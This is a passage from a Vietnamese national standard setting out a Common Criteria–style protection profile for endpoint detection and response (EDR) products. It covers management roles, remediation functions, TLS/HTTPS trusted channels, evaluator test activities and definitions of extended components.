9.2.3.1 FMT_SMF.1/ENDPOINT Đặc tả kỹ thuật của chức năng quản lý (Quản lý EDR của EDR)

FMT_SMF.1 -1/ENDPOINT

Tinh chỉnh: EDR sẽ có khả năng thực hiện các chức năng quản lý sau:

Chức năng quản lý

Quản trị

...

Người đọc

Cấu hình lượng thời gian để lưu giữ dữ liệu được EDR thu thập [chỉ định: khung thời gian để lưu giữ dữ liệu]

Nhận hoặc hiển thị trạng thái kết nối của Host Agent

...

Định cấu hình ngăn chặn trực quan các cảnh báo sự cố dựa trên danh sách từ chối có thể định cấu hình gồm [lựa chọn; tên tệp, thư mục, hàm băm tệp, [chỉ định: các yếu tố khác]]

Chú giải bảng: M = Bắt buộc, O = Tùy chọn, - = Không xác định

Lưu ý áp dụng: Yêu cầu này bao gồm tất cả các chức năng cấu hình TSF cung cấp cho người quản trị để cấu hình EDR.

...

TSS

Người đánh giá phải xác minh TSS chứa danh sách phân quyền và những chức năng họ có thể thực hiện. Người đánh giá phải xác minh danh sách phù hợp với khung yêu cầu. Người đánh giá kiểm tra TSS có mô tả về các giao thức mà IPS hỗ trợ có tương thích với các giao thức ở trên hay không.

Hướng dẫn

Người đánh giá phải xem xét hướng dẫn hoạt động để xác minh rằng EDR cung cấp các tài liệu để thực hiện các chức năng quản lý.

Đánh giá

Người đánh giá phải thực hiện các bài kiểm tra dưới đây với từng phân quyền, xác minh từng phân quyền bị từ chối hoặc có thể hoàn thành hành động dưới đây theo quy định của khung SFR:

Thử nghiệm 1: Người đánh giá phải định cấu hình lượng thời gian để giữ lại dữ liệu EDR được thu thập vào khung thời gian trong đó dữ liệu hiện có sẽ không khả dụng và xác minh rằng dữ liệu không còn có thể truy cập được thông qua giao diện quản trị.

Thử nghiệm 2: Người đánh giá phải hạn chế về mặt vật lý hoặc tác động vật lý tới các liên lạc mạng giữa hệ thống điểm cuối được quản lý và máy chủ EDR và xác minh rằng trạng thái kết nối bị hạn chế hoặc tạm dừng của Host Agent được định danh trên giao diện quản trị EDR.

Thử nghiệm 3: Người đánh giá phải hạn chế về mặt vật lý hoặc tác động hợp lý lên các giao tiếp mạng giữa hệ thống điểm cuối được quản lý và máy chủ EDR và xác minh rằng trạng thái kết nối bị hạn chế hoặc tạm dừng của Host Agent được định danh trên giao diện quản trị EDR.

...

9.2.3.2 FMT_SMF.1/Host Đặc tả kỹ thuật của chức năng quản lý (Quản lý EDR của máy chủ trung gian)

FMT_SMF.1.1/HOST

Tinh chỉnh: EDR phải có khả năng thực hiện các chức năng kiểm soát hành vi của Host Agent sau đây:

Chức năng quản lý

Quản trị

Chuyên gia phân tích SOC

Người đọc

Cấu hình khung thời gian để gửi dữ liệu từ Host Agent tới EDR [chỉ định: danh sách các khung thời gian có thể định cấu hình]

...

Chỉ định nhãn hoặc thẻ để phân loại hoặc nhóm các hệ thống điểm cuối riêng lẻ

Chú giải bảng: M = Bắt buộc, O = Tùy chọn, - = Không xác định

Lưu ý áp dụng: Yêu cầu này bao gồm tất cả chức năng cấu hình mà EDR cung cấp cho người quản trị để cấu hình Host Agent của EDR.

Hoạt động đánh giá:

TSS

...

Hướng dẫn

Người đánh giá phải xem xét hướng dẫn vận hành để xác minh rằng EDR có các khả năng được lập thành văn bản để thực hiện các chức năng quản lý.

Đánh giá

Người đánh giá phải thực hiện các bài kiểm tra dưới đây:

Thử nghiệm 1: Người đánh giá phải sửa đổi khung thời gian gửi dữ liệu của Host Agent tới EDR và xác minh rằng Host Agent bị ảnh hưởng đang gửi dữ liệu theo khoảng thời gian đã xác định.

Thử nghiệm 2: Người đánh giá phải gắn thẻ hoặc phân loại một nhóm các hệ thống điểm cuối riêng lẻ và xác minh rằng thẻ hoặc phân loại vẫn tồn tại trong bảng điều khiển quản lý EDR của những người dùng khác.

Thử nghiệm 3: Người đánh giá phải thử từng chức năng với từng phân quyền và xác minh quyền truy cập phù hợp với khung yêu cầu.

9.2.3.3 FMT_SM R.1 Phân quyền quản lý an toàn

FMT_SMR.1.1

...

FMTSMR.1.2

Tinh chỉnh: EDR phải có khả năng liên kết người dùng với từng phân quyền.

Lưu ý áp dụng: EDR phải được cấu hình, duy trì và sử dụng bởi các phân quyền người dùng khác nhau. Một phân quyền quản trị tối thiểu phải được hỗ trợ, một chuyên gia phân tích SOC có thể ban hành lệnh khắc phục cho các Host Agent và một người dùng chỉ được phép đọc chỉ có thể xem dữ liệu.

Tài khoản người dùng không cần phải được đặt tên theo nội dung, nhưng phải có ý nghĩa của các phân quyền theo phân quyền.

TCVN 8709-2:2011 chỉ định FIA_UID.1 phụ thuộc vào yêu cầu này vì TSF phải có phương pháp xác định người dùng để có thể liên kết với phân quyền quản lý. Sự phụ thuộc này được giải quyết thông qua FIA_AUT_EXT.1, trong đó chỉ định một phương pháp định danh người dùng thay thế.

Hoạt động đánh giá:

TSS

Người đánh giá phải kiểm tra TSS để xác minh cụ thể phân quyền và quyền hạn được cấp và giới hạn của phân quyền.

Hướng dẫn

...

Đánh giá

Thử nghiệm 1: Người đánh giá phải xác minh phân quyền của người quản trị hoặc chuyên gia phân tích SOC và người dùng chỉ đọc có sẵn, tạo các tài khoản riêng với mỗi phân quyền được chỉ định.

Thử nghiệm 2: Người đánh giá phải xác minh rằng phân quyền không phải là người quản trị không thể sửa đổi phân quyền của tài khoản của chính họ hoặc của người khác.

Thử nghiệm 3: Trong tiến trình thực hiện các hoạt động thử nghiệm để đánh giá, Người đánh giá phải sử dụng tất cả các giao diện được hỗ trợ, mặc dù không cần thiết phải lặp lại mỗi thử nghiệm liên quan đến một hành động quản trị với mỗi giao diện. Tuy nhiên, người đánh giá phải đảm bảo rằng mỗi phương pháp được hỗ trợ để quản lý EDR phù hợp với các yêu cầu của Hồ sơ bảo vệ này đều được thử nghiệm; ví dụ: nếu EDR có thể được quản lý thông qua giao diện phần cứng cục bộ hoặc TLS / HTTPS thì cả hai phương pháp quản lý phải được thực hiện trong tiến trình thực hiện các hoạt động thử nghiệm.

Thử nghiệm 4: Người đánh giá phải thử từng chức năng với từng phân quyền và xác minh quyền truy cập phù hợp với khung yêu cầu.

9.2.3.4 FMT_SRF_EXT.1 Đặc tả kỹ thuật của các chức năng khắc phục

FMT_SRF_EXT.1.1

EDR có khả năng thực hiện các chức năng khắc phục sau đây:

Chức năng quản lý

...

Chuyên gia phân tích SOC

Người dọc

Cách ly một điểm cuối bằng cách [lựa chọn: cách Iy về mặt logic điểm cuối khỏi mạng trừ khi được liệt kê cho phép, cách ly tệp độc hại trên điểm cuối]

Chấm dứt tiến trình đang chạy trên một điểm cuối

...

Truy xuất các tệp có khả năng bị ảnh hưởng hoặc trái phép từ một điểm cuối

Chú giải bảng: M = Bắt buộc, O = Tùy chọn, - = Không xác định

Lưu ý áp dụng: Yêu cầu này ghi lại tất cả các chức năng khắc phục mà EDR cung cấp cho chuyên gia phân tích SOC và Người quản trị (tùy chọn).

Cách ly về mặt logic khỏi mạng đề cập đến việc hạn chế giao tiếp từ điểm cuối đến phần còn lại của mạng, có thể bao gồm một danh sách cho phép hạn chế.

Hoạt động đánh giá:

TSS

...

Hướng dẫn

Người đánh giá phải xem xét hướng dẫn hoạt động để xác minh rằng EDR có khả năng để thực hiện các chức năng quản lý.

Đánh giá

Đối với mỗi phân quyền, người đánh giá phải thực hiện các thử nghiệm dưới đáy, xác minh rằng mỗi phân quyền trong biểu đồ có thể thực hiện các chức năng được phép của chúng và bị hạn chế thực hiện các chức năng mà chúng không có quyền truy cập theo chú giải (Chú giải bảng: M = Bắt buộc, 0 = Tùy chọn, - = Không xác định):

Thử nghiệm 1: Điều kiện: Nếu "cách ly về mặt logic điểm cuối khỏi mạng trừ khi được cho phép" được chọn, người đánh giá phải cách ly về mặt logic hệ thống điểm cuối được quản lý khỏi mạng và xác minh rằng hệ thống không thể truy cập địa chỉ mạng hoặc tài nguyên bên ngoài danh sách cho phép.

Thử nghiệm 2: Điều kiện: nếu "cách ly tệp độc hại trên điểm cuối" được chọn, người đánh giá phải xác minh chức năng cách ly các tệp có khả năng trái phép trên điểm cuối.

Thử nghiệm 3: Người đánh giá phải chạy một tệp thực thi trên hệ thống điểm cuối được quản lý, chấm dứt tiến trình của nó khỏi giao diện quản trị EDR và sau đó xác minh rằng tiến trình không còn chạy trên hệ thống.

Thử nghiệm 4: Người đánh giá phải đặt một tệp được biết là kích hoạt cảnh báo sự cố trên hệ thống tệp sau đó truy xuất nội dung của tệp từ bảng điều khiển quản lý EDR.

9.2.4 FPT: Bảo vệ TSF

...

FPT_ITT.1.1

Tinh chỉnh: EDR phải [lựa chọn:

- thực hiện [lựa chọn: TLS như được định nghĩa trong gói TLS, FITTPS như được định nghĩa trong Hồ sơ bảo vệ cơ sở],

- gọi chức năng do nền tảng cung cấp cho [lựa chọn: TLS, FITTPS]]

để bảo vệ dữ liệu TSF khỏi [sửa đổi, tiết lộ] khi được truyền tải giữa các phần riêng biệt của TOE.

Lưu ý áp dụng: Mục đích của yêu cầu trên là sử dụng các giao thức mật mã được xác định trong yêu cầu thiết lập và duy trì một kênh đáng tin cậy giữa EDR và Host Agent, được coi là các phần riêng biệt của TOE. Gói TLS cho phép sử dụng TLS hoặc DTLS. Chỉ có thể sử dụng TLS, DTLS hoặc HTTPS trong kênh đáng tin cậy này.

Yêu cầu này là để đảm bảo rằng việc truyền bất kỳ nhật ký, danh sách tiến trình, thông tin hệ thống, v.v. khi được lệnh hoặc trong khoảng thời gian cấu hình, được bảo vệ đúng cách. Kênh nội bộ này cũng bảo vệ mọi lệnh và chính sách do EDR gửi cho Host Agent. Host Agent hoặc EDR đều có thể bắt đầu kết nối.

Kênh nội bộ này bảo vệ kết nối giữa Host Agent với EDR và các kết nối giữa Host Agent không được kiểm soát với EDR trong quá trình đăng ký hoạt động. Các giao thức khác nhau có thể được sử dụng cho hai kết nối này và mô tả trong TSS sẽ làm rõ sự khác biệt này.

Kênh nội bộ sử dụng giao thức từ gói TLS hoặc HTTPS làm giao thức bảo vệ tính an toàn và tính toàn vẹn của thông tin liên lạc. Người đánh giá chọn cơ chế hoặc cơ chế được hỗ trợ bởi EDR, và sau đó đảm bảo các yêu cầu chính xác được bao gồm trong ST nếu chưa tồn tại. Giao thức, RBG, xác thực chứng chỉ, thuật toán và các dịch vụ tương tư có thể được đáp ứng với các dịch vụ do nền tảng cung cấp.

...

Hoạt động đảm bảo

TSS

Nếu "gọi chức năng do nền tảng cung cấp cho..." được chọn, Người đánh giá phải xác minh TSS chứa các lệnh đến nền tảng mà TOE đang tận dụng để gọi chức năng.

Nếu "thực hiện..." được chọn, Người đánh giá phải kiểm tra TSS để xác minh cách bảo vệ thông tin liên lạc của Agent- Server và phù hợp với SFR. Người đánh giá phải xác nhận rằng tất cả các giao thức được liệt kê trong TSS phù hợp với các giao thức được chỉ định trong yêu cầu và được bao gồm trong các yêu cầu trong ST.

Hướng dẫn

Người đánh giá phải xác nhận rằng hướng dẫn hoạt động chứa hướng dẫn cấu hình kênh liên lạc giữa Host Agent và EDR cho từng phương pháp được hỗ trợ.

Đánh giá

Thử nghiệm 1: Người đánh giá phải giả định rằng các thông tin liên lạc sử dụng từng phương thức truyền thông Agent-Server được chỉ định (trong hướng dẫn hoạt động) được kiểm tra trong quá trình đánh giá, thiết lập các kết nối như được mô tả trong hướng dẫn hoạt động và đảm bảo rằng giao tiếp thành công.

Thử nghiệm 2: Người đánh giá phải đảm bảo, cho từng phương pháp máy chủ ngoại vi thông tin liên lạc, dữ liệu kênh không được gửi bằng văn bản thuần túy.

...

9.2.5.1 FTP_TRP.1 Đường dẫn Tin cậy

FTP_TRP.1.1

Tinh chỉnh: EDR phải [lựa chọn:

- thực hiện lựa chọn: TLS như được định nghĩa trong Gói TLS, HTTPS như được định nghĩa trong Hồ sơ bảo vẻ cơ sở],

- gọi chức năng do nền tảng cung cấp cho [lựa chọn: TLS, HTTPS]

] để cung cấp một đường dẫn giao tiếp giữa chính nó và các người quản trị từ xa khác biệt về mặt logic và cung cấp xác định chắc chắn về các điểm cuối của nó và bảo vệ dữ liệu được truyền đạt khỏi [sửa đổi, tiết lộ].

FTP_TRP.1.2

Tinh chỉnh: EDR phải [lựa chọn: thực hiện chức năng, gọi chức năng do nền tảng cung cấp] để cho phép [người quản trị từ xa] bắt đầu giao tiếp thông qua đường dẫn đáng tin cậy.

FTP_TRP.1.3

...

Lưu ý áp dụng: Yêu cầu này đảm bảo rằng các người quản trị từ xa được ủy quyền bắt đầu tất cả các giao tiếp với EDR thông qua một đường dẫn đáng tin cậy và tất cả các giao tiếp với EDR bởi các người quản trị từ xa được thực hiện trên đường dẫn đó. Dữ liệu được truyền trong kênh truyền thông đáng tin cậy này được mã hóa như được định nghĩa trong giao thức được chọn trong lựa chọn đầu tiên. Tác giả ST chọn cơ chế hoặc cơ chế được hỗ trợ bởi EDR.

Hoạt động đánh giá:

TSS

Người đánh giá phải kiểm tra TSS để xác minh cách bảo vệ thông tin liên lạc quản trị từ xa và phù hợp với SFR. Người đánh giá phải kiểm tra TSS để xác định rằng các phương pháp quản trị TOE từ xa được chỉ định, cùng với cách các thông tin liên lạc đó được bảo vệ. Người đánh giá cũng sẽ xác nhận rằng tất cả các giao thức được liệt kê trong TSS để hỗ trợ quản trị TOE phù hợp với các giao thức được chỉ định trong yêu cầu và được bao gồm trong các yêu cầu trong ST.

Nếu "gọi nền tảng cung cấp chức năng cho..." được chọn trong FTP_TRP. 1.1, Người đánh giá phải xác minh TSS chứa các cuộc gọi đến nền tảng mà TOE đang tận dụng để gọi chức năng.

Hướng dẫn

Người đánh giá phải xác nhận rằng hướng dẫn hoạt động chứa các hướng dẫn để thiết lập các phiên xác nhận từ xa cho từng phương pháp được hỗ trợ.

Đánh giá

Thử nghiệm 1: Các Người đánh giá phải đảm bảo rằng thông tin liên lạc sử dụng từng phương pháp quản trị từ xa được chỉ định (trong hướng dẫn hoạt động) được kiểm tra trong quá trình đánh giá, thiết lập các đối số như được mô tả trong hướng dẫn hoạt động và đảm bảo rằng giao tiếp thành công.

...

Thử nghiệm 3: Người đánh giá phải đảm bảo, đối với mỗi phương pháp quản trị từ xa, dữ liệu kênh không được gửi bằng văn bản thuần túy.

9.3 Đặc điểm về các yêu cầu chức năng an toàn TOE

Các đặc điểm sau đây cung cấp giải thích cho từng đích an toàn của TOE, cho thấy rằng các SFR phù hợp để đáp ứng và đạt được các đích an toàn:

ĐỐI TƯỢNG

XÁC ĐỊNH BỞI

ĐẶC ĐIỂM

O.ACCOUNTABILITY

FAU_GEN.1/EDR,

FIA_AUT_EXT. 1

...

Tiêu chuẩn bao gồm FIA_AUT_EXT.1 để cung cấp cơ chế xác thực người dùng quản lý để có thể được liên kết với hành động của người dùng.

O.EDR_MANAGEMENT

FAU_ALT_EXT.1, FAU_COL_EXT.1,

FIA_AUT_EXT.1,

FIA_PWD_EXT.1,

FMT_SMF.1/ENDPOINT,

FMT_SMF.1/HOST, FMT_SMR.1,

FMT_SRF_EXT. 1, FMT_TRM_EXT. 1

(Đối tượng)

...

Tiêu chuẩn bao gồm FAU_COL_EXT.1 để hỗ trợ quản lý bằng cách xác định dữ liệu liên quan đến an toàn được thu thập bởi TSF. Tiêu chuẩn bao gồm FIA_AUT_EXT.1 để xác định cách TSF xác thực người dùng quản trị để giới hạn các chủ thể có thể thực thi các chức năng quản lý trên TOE.

Tiêu chuẩn bao gồm FIA_PWD_EXT.1 để xác định các yêu cầu thành phần cho Yếu tố xác thực mật khẩu nhằm đảm bảo rằng người dùng không được ủy quyền thì không thể truy cập các chức năng quản trị được bảo vệ mà không được phép.

Tiêu chuẩn bao gồm FMT_SMF.1/ENDPOINT để xác định các chức năng quản lý có thể được thực hiện để kiểm soát hành vi của TSF và các phân quyền quản lý được phép thực hiện các chức năng đó.

Tiêu chuẩn bao gồm FMT_SMF.1/HOST để xác định các chức năng quản lý có thể được thực hiện nhằm kiểm soát hành vi của Host Agent được kết nối với TOE và các phân quyền quản lý được ủy quyền để thực hiện các chức năng đó.

Tiêu chuẩn bao gồm FMT_SMR.1 để xác định các phân quyền quản lý mà TSF hỗ trợ sao cho các chức năng quản lý của nó có thể được phân tách theo phân quyền.

Tiêu chuẩn bao gồm FMT_SRF_EXT.1 để xác định các chức năng khắc phục khả dụng cho người dùng được ủy quyền để đưa ra các hành động khắc phục trên hệ thống có Flost Agent được kết nối.

Tiêu chuẩn bao gồm FMT_TRM_EXT.1 để cung cấp khả năng tùy chọn nhằm đảm bảo tính toàn vẹn của các lệnh và chính sách quản lý được cấp cho Host Agent bên ngoài thông qua việc sử dụng chữ ký số.

O.PROTECTED_TRANSIT

FCS_DTLSS_EXT. 1 (từ gói TLS), FCS_DTLSC_EXT. 1 (từ gói TLS), FCS_HTTPS_EXT.1 (từ Hồ sơ bảo vệ cơ sở), FCS_TLSC_EXT. 1 (từ gói TLS), FCS_TLSC_EXT.2 (từ gói TLS), FCS_TLSS_EXT.1 (từ gói TLS), FCS_TLSS_EXT.2 (từ gói TLS), FPT_ITT.1, FTP_TRP.1

...

Tiêu chuẩn tham chiếu FCS_DTLSC_EXT. 1 từ gói TLS cho các trường hợp khí DTLS với vai trò là máy khách được sử dụng làm kênh liên lạc đáng tin cậy.

Tiêu chuẩn tham chiếu FCS_DTLSS_EXT.1 từ gói TLS cho các trường hợp khi DTLS làm máy chủ được sử dụng làm kênh liên lạc đáng tin cậy.

Tiêu chuẩn tham chiếu FCS_TLSC_EXT.1 từ Gói TLS cho các trường hợp khi TLS được sử dụng làm kênh liên lạc đáng tin cậy trên máy khách.

Tiêu chuẩn tham chiếu FCS_TLSC_EXT.2 từ Gói TLS cho các trường hợp khi TOE sử dụng triển khai máy khách TLS hỗ trợ xác thực lẫn nhau.

Tiêu chuẩn tham chiếu FCS_TLSS_EXT.1 từ Gói TLS cho các trường hợp khi TLS được sử dụng làm kênh liên lạc đáng tin cậy trên máy chủ.

Tiêu chuẩn tham chiếu FCS_TLSS_EXT.2 từ Gói TLS cho các trường hợp khi TOE sử dụng triển khai máy khách TLS hỗ trợ xác thực lẫn nhau

Tiêu chuẩn bao gồm FPT_ITT.1 để xác định kênh tin cậy nội bộ mà TSF sử dụng để giao tiếp với các Host Agent được kết nối cũng như các giao thức truyền thông được sử dụng để thiết lập các kênh tin cậy này.

Tiêu chuẩn bao gồm FTP_TRP.1 để xác định các giao thức truyền thông được sử dụng để hỗ trợ quản trị TSF từ xa an toàn.

10 Đặc điểm về tính nhất quán

...

10.1.1 Tính nhất quán của chủng loại TOE

Nếu tiêu chuẩn này được sử dụng để mở rộng Hồ sơ bảo vệ cho phần mềm ứng dụng, chủng loại TOE cho TOE tổng thể vẫn là một ứng dụng dựa trên phần mềm. Ranh giới TOE đơn giản được mở rộng để bao gồm chức năng EDR được tích hợp trong ứng dụng sao cho chức năng an toàn bổ sung được yêu cầu trong phạm vi của TOE.

10.1.2 Tính nhất quán của định nghĩa các vấn đề an toàn

Các mối đe dọa, giả định và OSP được xác định bởi tiêu chuẩn này bổ sung cho những điều được xác định trong TCVN 13468:2022 Công nghệ thông tin - Các kỹ thuật an toàn - Hồ sơ bảo vệ cho phần mềm ứng dụng như sau:

Mối đe dọa, Giả định, OSP

Đặc điểm về tính nhất quán

T.MISCONFIGURATION

Mối đe dọa này phù hợp với Hồ sơ bảo vệ cơ sở vì đây là một ví dụ cụ thể về mối đe dọa T.LOCAL_ATTACK được xác định ở đó. Trong trường hợp này, cuộc tấn công cục bộ nhằm thay đổi hành vi của chính ứng dụng một cách có chủ ý thay vì sử dụng ứng dụng như một phương pháp để tấn công nền tảng hệ điều hành.

T.CREDENTIAL_REUSE

...

A. CONNECTIVITY

Giả định này nhất quán với Hồ sơ bảo vệ cơ sở vì giả định tính khả dụng của mạng nhất quán với giả định A.PLATFORM được xác định bởi Hồ sơ bảo vệ cơ sở, giả định này mong muốn TOE có một nền tảng điện toán đáng tin cậy.

10.1.3 Tính nhất quán của các mục tiêu

Các mục tiêu cho TOE nhất quán với Hồ sơ bảo vệ cho phần mềm ứng dụng dựa trên lý do sau:

Mối đe dọa, Giả định, OSP

Đặc điểm về tính nhất quán

O.ACCOUNTABILITY

Mục tiêu này liên quan đến khả năng TOE xác định và xác thực người dùng và ghi lại hành vi của những người dùng này. Hồ sơ bảo vệ cơ sở không xác định cơ chế xác thực nên mục tiêu này không ảnh hưởng đến việc thực thi các SFR của Hồ sơ bảo vệ cơ sở.

O.EDF_MANAGEMENT

...

O.PROTECTED_TRANSIT

O.PROTECTED _COMMS của Hồ sơ bảo vệ cơ sở bằng cách đảm bảo rằng các thông tin liên lạc liên quan đến EDR và Host Agent đã đăng ký được đảm bảo an toàn theo cách tương tự như dữ liệu nhạy cảm khác.

Các mục tiêu cho Môi trường hoạt động của TOE nhất quán với Hồ sơ bảo vệ cho phần mềm ứng dụng dựa trên đặc điểm sau:

Môi trường hoạt động

Đặc điểm về tính nhất quán

OE.RELIABLE_TRANSIT

Mục tiêu này liên quan đến một giao diện bên ngoài không tồn tại trong Hồ sơ bảo vệ cơ sở và không ảnh hưởng đến chức năng của Hồ sơ bảo vệ cơ sở.

10.1.4 Tính nhất quán của các yêu cầu

Tiêu chuẩn này xác định một số SFR từ Hồ sơ bảo vệ cho phần mềm ứng dụng cần thiết để hỗ trợ chức năng phát hiện và phản hồi điểm cuối (EDR). Điều này được coi là nhất quán vì chức năng do Hồ sơ bảo vệ cho phần mềm ứng dụng cung cấp đang được sử dụng cho mục đích đã định. Đặc điểm tại sao điều này không mâu thuẫn với các tuyên bố do Hồ sơ bảo vệ cho phần mềm ứng dụng xác định như sau:

...

Đặc điểm về tính nhất quán

SFR sửa đổi

Tiêu chuẩn này không sửa đổi bất kỳ yêu cầu nào khi Hồ sơ bảo vệ cho phần mềm ứng dụng là cơ sở.

SFR bắt buộc

FAU_ALT_EXT.1

SFR này xác định các cảnh báo có thể kiểm tra được cho EDR. Không ảnh hưởng đến chức năng [Hồ sơ bảo vệ cho phần mềm ứng dụng].

FAU_COL_EXT.1

SFR này xác định dữ liệu sự kiện tối thiểu mà EDR thu thập từ Host Agent. Không ảnh hưởng đến chức năng [Hồ sơ bảo vệ cho phần mềm ứng dụng].

FAU_GEN.1/EDR

...

FIA_AUT_EXT.1

SFR này xác định cơ chế xác thực cho EDR. Không ảnh hưởng đến chức năng [Hồ sơ bảo vệ cho phần mềm ứng dụng].

FIA_PWD_EXT.1

SFR này xác định tiêu chí xác thực cụ thể cho mật khẩu. Không ảnh hưởng đến chức năng [Hồ sơ bảo vệ cho phần mềm ứng dụng].

FMT_SMF.1/ENDPOINT

SFR này xác định một bộ cụ thể các chức năng quản lý cho một EDR bởi một EDR. Không ảnh hưởng đến chức năng [Hồ sơ bảo vệ cho phần mềm ứng dụng].

FMT_SMF.1/HOST

SFR này xác định một bộ cụ thể các chức năng quản lý cho Host Agent bởi một EDR. Không ảnh hưởng đến chức năng [Hồ sơ bảo vệ cho phần mềm ứng dụng].

FMT_SMR.1

...

FMT_SRF_EXT.1

SFR này xác định một bộ chức năng khắc phục cụ thể cho EDR.

Không ảnh hưởng đến chức năng [Hồ sơ bảo vệ cho phần mềm ứng dụng].

FPT_ITT.1

SFR này xác định một bộ chức năng cụ thể để liên lạc an toàn khác biệt về mặt logic với Host Agent. Không ảnh hưởng đến chức năng [Hồ sơ bảo vệ cho phần mềm ứng dụng].

FTP_TRP.1

SFR này xác định một bộ chức năng cụ thể để quản trị EDR từ xa an toàn. Không ảnh hưởng đến chức năng [Hồ sơ bảo vệ cho phần mềm ứng dụng].

SFR tùy chọn

Tiêu chuẩn này không xác định bất kỳ yêu cầu tùy chọn nào.

...

Tiêu chuẩn này không xác định bất kỳ yêu cầu dựa trên lựa chọn nào.

SFR mục tiêu

FMT_TRM_EXT.1

SFR này xác định các biện pháp bảo vệ cho tính toàn vẹn của các lệnh được gửi đến Host Agent. Không ảnh hưởng đến chức năng [Hồ sơ bảo vệ cho phần mềm ứng dụng].

Phụ lục A

(Quy định)

Các SFR tùy chọn

Tiêu chuẩn này không xác định bất kỳ SFR tùy chọn nào.

...

Phụ lục B

(Quy định)

SFR cơ sở được lựa chọn

Tiêu chuẩn này không xác định bất kỳ SFR cơ sở nào được lựa chọn.

Phụ lục C

(Tham khảo)

SFR mục tiêu

Phần này được dành riêng cho các yêu cầu hiện không được tiêu chuẩn này quy định nhưng dự kiến sẽ được đưa vào các phiên bản tương lai của tiêu chuẩn. Các đơn vị cung cấp có kế hoạch thực hiện đánh giá đối với các sản phẩm trong tương lai được khuyến khích lập kế hoạch để đáp ứng các yêu cầu khách quan này.

...

FMT_TRM_EXT. 1.1

Tinh chỉnh: [lựa chọn: EDR, Nền tảng EDR] phải ký điện tử các lệnh và chính sách được gửi đến Host Agent bằng chữ ký [lựa chọn: RSA, ECDSA] đáp ứng FIPS PUB 186-4.

Lưu ý áp dụng: Mục đích của yêu cầu này là liên kết bằng mật mã bất kỳ cập nhật chính sách hoặc lệnh nào được gửi đến Host Agent dưới dạng từ EDR. Điều này không phải để bảo vệ các chính sách trong quá trình vận chuyển vì chúng đã được bảo vệ bởi FPT_ITT.1. Nếu TSF thực hiện chức năng này, bất kỹ thuật toán chữ ký nào được sử dụng phải nhất quán với bất kỳ lựa chọn nào được thực hiện trong FCS_COP.1(3).

Phụ lục D

(Quy định)

Định nghĩa thành phần mở rộng

Phụ lục này bao gồm các định nghĩa đối với các yêu cầu mở rộng được sử dụng trong tiêu chuẩn, bao gồm các định nghĩa được sử dụng trong Phụ lục A đến C.

1 Bối cảnh và Phạm vi

...

Lớp chức năng

Thành phần chức năng

Kiểm toán an toàn (FAU)

FAU_ALT_EXT Cảnh báo máy chủ

FAU_COL_EXT Dữ liệu điểm cuối đã thu thập

Định danh và Xác thực (FIA)

FIA_AUT_EXT Cơ chế xác thực bảng điều khiển

FIA_PWD_EXT Xác thực mật khẩu

Quản lý an toàn (FMT)

...

FMT_TRM_EXT Chức năng khắc phục đáng tin cậy

2 Định nghĩa thành phần mở rộng

FAU_AL_TEXT Cảnh báo máy chủ

Các thành phần trong họ này xác định các yêu cầu đối với hoạt động hệ thống khiến TSF tạo ra cảnh báo về hoạt động và nội dung của các cảnh báo này.

Phân cấp thành phần

FAU_ALT_EXT.1, cảnh báo máy chủ, mô tả các kích hoạt cảnh báo và thông tin có trong cảnh báo.

Quản lý: FAU_ALT_EXT.1

Các hành động sau đây có thể được xem xét cho các chức năng quản lý trong FMT:

- Cấu hình triệt tiêu trực quan các cảnh báo.

...

Không có sự kiện có thể kiểm toán dự kiến.

FAU_AL_TEXT.1 Cảnh báo Máy chủ

Phân cấp tới: Không có thành phần nào khác.

Phụ thuộc vào: Không phụ thuộc.

FAU_ALT_EXT.1.1

EDR sẽ cảnh báo người dùng được ủy quyền trên bảng điều khiển quản lý trong trường hợp xảy ra bất kỳ trường hợp nào sau đây:

a. Thay đổi trạng thái đăng ký Host Agent,

b. Phát hiện hoạt động có khả năng trái phép trên các điểm cuối đã đăng ký.

FAU_ALT_EXT.1.2

...

a. Mức độ nghiêm trọng ban đầu của sự cố và [lựa chọn: đánh giá, phân loại, điểm số, xếp hạng].

b. Một dòng thời gian sự cố.

FAU_ALT_EXT.1.3

EDR phải cung cấp khả năng xuất dữ liệu cho các cảnh báo đã chọn với định dạng dựa trên tiêu chuẩn cụ thể là [chỉ định: định dạng cảnh báo].

FAU_COL_EXT Dữ liệu điểm cuối đã thu thập

Các thành phần trong họ này xác định các yêu cầu đối với dữ liệu được thu thập từ Host Agent.

Phân cấp thành phần

FAU_COL_EXT.1, Dữ liệu điểm cuối được thu thập, xác định dữ liệu cụ thể được thu thập từ Host Agent.

Quản lý: FAU_COL_EXT.1

...

- Cấu hình khoảng thời gian để truyền dữ liệu đã thu thập.

- Cấu hình thông tin nhãn hoặc thẻ để liên kết dữ liệu đã thu thập với các hệ thống điểm cuối riêng lẻ hoặc nhóm hệ thống.

Kiểm toán: FAU_COL_EXT.1

Không có sự kiện có thể kiểm toán dự kiến.

FAU_COL_EXT.1 Dữ liệu điểm cuối đã thu thập

Phân cấp thành: Không có thành phần nào khác.

Phụ thuộc vào: Không phụ thuộc.

FAU_COL_EXT.1.1

EDR phải thu thập bộ dữ liệu điểm cuối tối thiểu sau đây từ Host Agent:

...

b. Hoạt động đăng nhập tài khoản điểm cuối đặc quyền và không đặc quyền,

c. Tạo tiến trình,

d. Thư viện và mô-đun được tải bởi các tiến trình,

đ. Tên tệp và [chỉ định: siêu dữ liệu khác] của các tệp được tạo và [chỉ định: các hoạt động khác được thực hiện đối với tệp] trên bộ lưu trữ liên tục,

f. [chỉ định: Dữ liệu máy chủ khác].

FIA_AUT_EXT Cơ chế xác thực bảng điều khiển

Các thành phần trong họ này xác định các yêu cầu đối với hành vi xác thực duy nhất đối với EDR TOE.

Phân cấp thành phần

FIA_AUT_EXT.1, Cơ chế xác thực bảng điều khiển, xác định các yếu tố xác thực duy nhất có thể được sử dụng để xác thực bảng hiển thị quản lý của EDR.

...

Không có chức năng quản lý cụ thể nào được xác định.

Kiểm toán: FIA_AUT_EXT.1

Không có sự kiện nào có thể kiểm tra được dự kiến.

FIA_AUT_EXT.1 Cơ chế xác thực bảng điều khiển

Phân cấp thành: Không có thành phần nào khác.

Phụ thuộc vào: Không phụ thuộc.

FIA_AUT_EXT.1.1

EDR phải [lựa chọn:

- tận dụng nền tảng để xác thực,

...

+ xác thực bằng thẻ thông minh bên ngoài và mã PIN,

+ không có yếu tố nào khác]

] để hỗ trợ đăng nhập vào bất kỳ bảng điều khiển hoặc API quản lý nào.

FIA_PWD_EXT Xác thực mật khẩu

Các thành phần trong họ này xác định các yêu cầu đối với tiêu chí xác thực mật khẩu.

Phân cấp thành phần

